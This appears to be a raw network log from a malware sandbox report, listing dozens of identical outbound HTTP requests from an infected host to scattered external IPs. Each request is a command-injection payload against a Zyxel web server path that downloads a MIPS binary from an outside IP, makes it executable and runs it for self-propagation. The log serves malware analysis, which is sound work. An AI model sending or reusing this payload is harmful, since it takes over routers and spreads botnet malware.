                                              Jan 29, 2024 07:03:47.975574970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3975192.168.2.1449828118.227.228.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975608110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3976192.168.2.144634836.156.106.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975641012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3977192.168.2.146093675.97.192.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975661039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3978192.168.2.145144280.95.171.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975708961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3979192.168.2.1448782122.250.74.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975775957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3980192.168.2.143593489.28.129.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975801945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3981192.168.2.145888273.254.121.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975831032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3982192.168.2.143946657.76.79.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975892067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3983192.168.2.143760086.168.81.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975902081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3984192.168.2.1454666121.232.241.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975934982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3985192.168.2.1452658150.177.30.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.975990057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3986192.168.2.1448434162.200.167.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.976016045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3987192.168.2.145590494.213.124.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.976039886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3988192.168.2.1457522129.68.171.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.976089001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3989192.168.2.1450404211.52.158.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.976118088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3990192.168.2.144009218.25.88.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.976169109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3991192.168.2.145506680.179.137.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.976203918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3992192.168.2.143562493.63.2.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978135109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3993192.168.2.145504270.17.90.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978214979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3994192.168.2.1448460135.4.105.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978245974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3995192.168.2.14533924.26.14.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978276968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3996192.168.2.145047624.88.203.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978326082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3997192.168.2.1457780162.207.106.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978367090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3998192.168.2.1452938180.228.106.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978405952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3999192.168.2.143468687.16.106.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978468895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4000192.168.2.1440254143.165.192.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978530884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4001192.168.2.1447552110.174.164.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978557110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4002192.168.2.1454034173.57.32.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978600979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4003192.168.2.1439670102.92.5.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978638887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4004192.168.2.143703052.237.160.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978693008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4005192.168.2.145847884.227.109.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978754997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4006192.168.2.1437726124.15.227.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978785038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4007192.168.2.1456098210.243.240.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978812933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4008192.168.2.1452850130.245.119.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978854895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4009192.168.2.1440006118.10.129.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.978976011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4010192.168.2.1458910114.75.232.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979017019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4011192.168.2.143647262.10.182.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979054928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4012192.168.2.1446436187.205.98.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979105949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4013192.168.2.1460802177.177.195.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979140997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4014192.168.2.145977827.30.32.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979170084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4015192.168.2.144980212.51.16.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979187965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4016192.168.2.1434062189.217.194.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979242086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4017192.168.2.145432688.223.82.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979269981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4018192.168.2.1450274114.17.173.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979300976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4019192.168.2.1456960106.113.58.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979326963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4020192.168.2.1438292150.83.120.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979362011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4021192.168.2.145544840.130.202.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979377031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4022192.168.2.143950638.175.24.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979414940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4023192.168.2.1458304182.166.117.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979438066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4024192.168.2.1447454179.167.186.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979479074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4025192.168.2.1445026114.230.60.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979520082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4026192.168.2.144580688.225.221.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979574919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4027192.168.2.144608465.228.102.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979604006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4028192.168.2.144780461.199.174.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979640961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4029192.168.2.1441590223.134.214.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979671955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4030192.168.2.1450076211.72.238.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979729891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4031192.168.2.1457468212.153.113.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979758978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4032192.168.2.143583291.14.111.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979805946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4033192.168.2.145567698.100.55.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979811907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4034192.168.2.1446142202.145.149.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979871035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4035192.168.2.1439054105.32.28.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979926109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4036192.168.2.1452430181.239.202.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.979950905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4037192.168.2.1439040179.50.125.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.980015993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4038192.168.2.1435912187.8.231.35443
                                              TimestampBytes transferredDirectionData
